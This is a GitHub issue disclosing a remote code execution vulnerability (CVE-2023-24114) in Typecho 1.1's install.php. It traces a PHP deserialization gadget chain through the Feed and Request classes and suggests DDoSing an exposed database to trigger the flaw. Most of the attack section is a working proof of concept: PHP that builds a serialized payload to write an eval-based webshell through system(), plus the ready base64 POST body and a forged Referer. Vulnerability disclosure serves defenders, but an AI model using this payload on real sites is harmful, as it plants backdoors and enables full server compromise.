Headline
CVE-2023-24114: the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability · Issue #1523 · typecho/typecho
typecho 1.1/17.10.30 was discovered to contain a remote code execution (RCE) vulnerability via install.php.
List of Vulnerable path
Vulnerable path /install.php
Lines 60-69 of the “install.php” catch the error but do nothing,so bypass the line 65’s "exit".
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.
We can simulate this situation by breakpoint debugging.Set the breakpoint on the line 60,then cut off the connection with the database.(such as phpstorm + phpstudy and so on)
Lines 74-87 of the "install.php",we can fake the reffer bypass the second "exit".we can set the reffer "http://localhost/".
Line 291 of the “install.php” has a function "unserialize",it can be exploited maliciously.
The parameters come from line 83 of the "/var/Typecho/Cookie.php".
Line 420 of the “install.php” triggeres function "__toString".
Line 223 of the “/var/Typecho/Feed.php” has function “__toString”
Line 290 of the “/var/Typecho/Feed.php” triggeres function "__get".
Line 270 of the “/var/Typecho/Request.php” has function “__get”
We can exploit function “call_user_func” to Remote Code Execute.
Vulnerability exploitation process:
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.Of course,we can send network packets repeatedly to wait for it.
The “ok” will be sent if it is success because of the POC.Then test the webshell.
POC code:
<?php class Typecho_Request{ private $_params= array(‘screenName’=> ‘php -r “echo \’ok\’;file_put_contents(\’cmd.php\’, \’<?php eval($_POST[\"youyou\”]); ?>\’);"’); private $_filter= array(‘system’); } class Typecho_Feed{ private $_items=array(); private $_type=’ATOM 1.0’; public function __construct() { $items[‘author’]=new Typecho_Request(); $this->_items[0]=$items; } } $config[‘prefix’] = new Typecho_Feed();; $payload = base64_encode(serialize($config)); echo $payload;
URL: http://localhost/install.php?start=1 POST Data: delete=true&__typecho_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0= Reffer: http://localhost/